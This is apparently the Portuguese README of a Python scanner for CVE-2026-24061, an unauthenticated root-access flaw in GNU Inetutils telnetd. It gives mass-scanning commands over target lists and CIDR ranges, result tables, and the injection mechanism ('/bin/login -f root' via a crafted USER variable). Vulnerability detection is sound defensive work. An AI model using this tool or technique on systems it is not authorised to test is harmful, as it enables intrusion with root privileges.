
GNU Inetutils telnet vulnerabilidade de bypass de autenticação remota (CVE-2026-24061), esta vulnerabilidade decorre do tratamento inadequado de variáveis de ambiente no componente telnetd do GNU Inetutils. Um atacante pode explorar esta vulnerabilidade construindo uma variável de ambiente USER maliciosa e enviando-a ao serviço telnet afetado, acionando o mecanismo de bypass de autenticação, obtendo assim acesso root diretamente sem necessidade de senha.
Esta é uma ferramenta avançada de detecção para a vulnerabilidade de bypass de autenticação no GNU Inetutils Telnetd (CVE-2026-24061). A vulnerabilidade possui pontuação CVSS de 9.8, permitindo que atacantes obtenham acesso root sem autenticação por meio de injeção de variáveis de ambiente.
# Suporte a cores no Windows
pip install colorama
python3 CVE-2026-24061.py 192.168.1.1
# Criar arquivo de alvos
echo "192.168.1.1" > targets.txt
echo "192.168.1.2" >> targets.txt
echo "192.168.1.3" >> targets.txt
# Executar detecção em lote
python3 CVE-2026-24061.py -f targets.txt
# Especificar porta e número de threads
python3 CVE-2026-24061.py -f targets.txt -p 23 -t 50
# Modo detalhado e salvar resultados
python3 CVE-2026-24061.py -f targets.txt -o results.txt -v
# Tempo limite personalizado
python3 CVE-2026-24061.py -f targets.txt -T 10
| Status | Indicador | Cor | Descrição |
|---|---|---|---|
| Vulnerabilidade confirmada | ✓ | 🔴 Vermelho | uid=0 e gid=0 detectados simultaneamente |
| Altamente suspeito | ⚠ | 🟡 Amarelo | uid=0 e usuário root detectados |
| Requer confirmação | ? | 🔵 Ciano | Apenas uid=0 detectado, requer verificação manual |
| Seguro | ✗ | 🟢 Verde | Nenhuma característica de vulnerabilidade detectada |
| Falha de conexão | ✗ | ⚪ Cinza | Problema de conexão de rede |
[✓ Vulnerabilidade confirmada] [14:30:25] 192.168.1.1:23 └─ Vulnerabilidade confirmada | uid=0/gid=0 | Banner: Ubuntu 20.04
[⚠ Altamente suspeito] [14:30:26] 192.168.1.2:23 └─ Altamente suspeito | uid=0 + root | Banner: Debian 12
[? Requer confirmação] [14:30:27] 192.168.1.3:23 └─ uid=0 detectado, mas faltam outras condições de confirmação
| Parâmetro | Abreviação | Valor padrão | Descrição |
|---|---|---|---|
--file | -f | - | Caminho do arquivo de alvos |
--port | -p | 23 | Porta alvo |
--threads | -t | 50 | Número de threads concorrentes |
--timeout | -T | 8 | Tempo limite por alvo (segundos) |
--output | -o | - | Arquivo de saída de resultados |
--verbose | -v | False | Modo de saída detalhado |
--user | -u | root | Nome de usuário para autenticação |
O arquivo de alvos suporta os seguintes formatos: 192.168.1.1 192.168.1.2:2323 # Porta especificada 192.168.1.0/24 # Formato CIDR 10.0.0.1-10.0.0.10 # Intervalo de IP
Esta vulnerabilidade explora a falha no tratamento inadequado de variáveis de ambiente pelo GNU Inetutils Telnetd:
/bin/login -f root# Condições de detecção múltipla
uid_0_detected = "uid=0" in response_text
gid_0_detected = "gid=0" in response_text
root_detected = "root" in response_text
# Lógica de confirmação de vulnerabilidade
if uid_0_detected and gid_0_detected:
return "Vulnerabilidade confirmada"
elif uid_0_detected and root_detected:
return "Altamente suspeito"
elif uid_0_detected:
return "Requer confirmação"
·


